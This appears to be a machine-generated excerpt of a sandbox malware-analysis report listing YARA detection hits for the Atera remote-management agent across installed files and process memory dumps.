C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DFA216B805B95A0808.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 84 entries

Memory Dumps

Source	Rule	Description	Author
0000001B.00000002.2295300733.00000150D7D2E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500686000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2684946960.00000256F0270000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.3071172900.0000011CCB8E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2945403740.0000023000103000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2950479205.0000011CB267B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2684946960.00000256F02AD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.3071172900.0000011CCB994000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.00000251007EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2684509702.00000256F00F0000.00000004.00000020.00040000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2748549728.0000025179520000.00000004.00000020.00040000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000003.2773115836.00000175695DD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.000002568056B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2568740282.000002A332560000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF221000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000003.2773306481.0000017568C6A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2790630051.0000019F9B825000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2216815750.00000247F80B2000.00000002.00000001.01000000.0000001D.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2376289826.000001C2ECC42000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2369172218.000001C2EADE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.0000025680291000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2574946100.000002A332F6E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2755851188.00000251797A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2792340884.0000019F9BDD6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2037183161.0000028A55612000.00000002.00000001.01000000.00000018.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.00000256806B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2215218351.00000247F78FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2684946960.00000256F0279000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A5003CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2389774485.000001A571020000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2950479205.0000011CB2660000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2062023214.0000020593C13000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2282885543.00000150BEB40000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2959967740.0000021F24FE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.00000251004CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2785759950.0000019F9B630000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.00000256806F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2061211828.0000020593298000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000003.2773115836.00000175695E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000002.2774336632.0000017568C71000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2369172218.000001C2EADFB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2999483708.0000023071BC2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002A.00000003.2392637897.000001F751BB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.3009834165.0000023071E20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2369172218.000001C2EAE6D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2397219667.000001A5723D7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2385596719.000001A570E25000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2061211828.00000205932AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002A.00000002.2455544706.000001F751A70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2215218351.00000247F78F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2450784251.0000028A191AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100862000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2513427313.000001F14A4A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517AB75000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2352910675.000001C280001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2573605708.000002A3326A2000.00000002.00000001.01000000.00000035.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2568740282.000002A33263C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517ABBA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2785759950.0000019F9B664000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000003.2713672868.0000017569510000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100796000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1848077610.000002167B6E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2945403740.0000023000111000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2038194012.0000028A6E48E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1846105414.00000216792CC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2508147012.000001F14A301000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2385596719.000001A570E86000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2061858920.0000020593520000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB3363000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.0000021600001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2516150200.000001F14ADE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2408792996.00007FFDF11A9000.00000004.00000001.01000000.0000001C.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.0000021600132000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.0000021600089000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF2B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002A.00000002.2455730867.000001F751B90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2352910675.000001C280010000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2691494022.00000256F1230000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2036704581.0000028A55300000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2568740282.000002A3325EE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2794634831.0000019F9BFDC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1845968252.0000021679290000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2220490149.00000247F9856000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2761360886.000002517A740000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2281891177.00000150BEA4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.3208734070.0000021F3DE16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2549890793.000001F1633B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB341B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2794634831.0000019F9BFC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2354939972.00000043E54F5000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF464000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2516150200.000001F14AC61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2216475348.00000247F7BE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2950479205.0000011CB2748000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000003.2773192747.00000175695E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2385596719.000001A570E3C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2950479205.0000011CB2668000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.0000025680001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2453247953.0000028A199A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2962491449.0000021F257E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2761043013.00007FFDF11B0000.00000004.00000001.01000000.0000001C.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2450784251.0000028A19178000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2220335636.00000247F9647000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2450784251.0000028A19170000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2385523899.000001A570DF0000.00000004.00000020.00040000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2695822328.00000256F20C8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2784817989.0000019F9B610000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.00000256806F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2548326525.000001F16334E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002A.00000002.2455544706.000001F751A94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2748747455.0000025179560000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2947253751.0000021F24E20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2568740282.000002A3325AF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2999483708.0000023071B8C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2785759950.0000019F9B702000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2453247953.0000028A19921000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517AB5F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2220369033.00000247F9845000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001D.00000002.2152982733.00000199E50E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2061211828.00000205932CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2508147012.000001F14A2FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000002.2774555804.00000175695E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2211260331.0000024780001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517AB00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2945403740.000002300007B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.0000021600135000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2217394716.00000247F88AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000003D.00000002.2638576747.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2941505779.000000E8E6581000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000003.2773226461.0000017568C6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500084000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2217394716.00000247F8880000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2516150200.000001F14AD99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB337A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB3399000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2791096428.0000019F9B880000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001D.00000002.2152982733.00000199E50EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2947253751.0000021F24E6D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.000002568048A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2037234967.0000028A556C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.00000216000B2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2281891177.00000150BEA10000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2684946960.00000256F030C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.00000251006DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2794634831.0000019F9C036000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2947253751.0000021F24DEC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2037499219.0000028A55D31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2036704581.0000028A55340000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000002.2774246214.0000017568C6D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.000002510006B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2291098978.00000150D7A40000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2580997801.000002A34B5F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2695950550.00000256F20D9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1848517334.000002167B921000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2211260331.00000247805AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
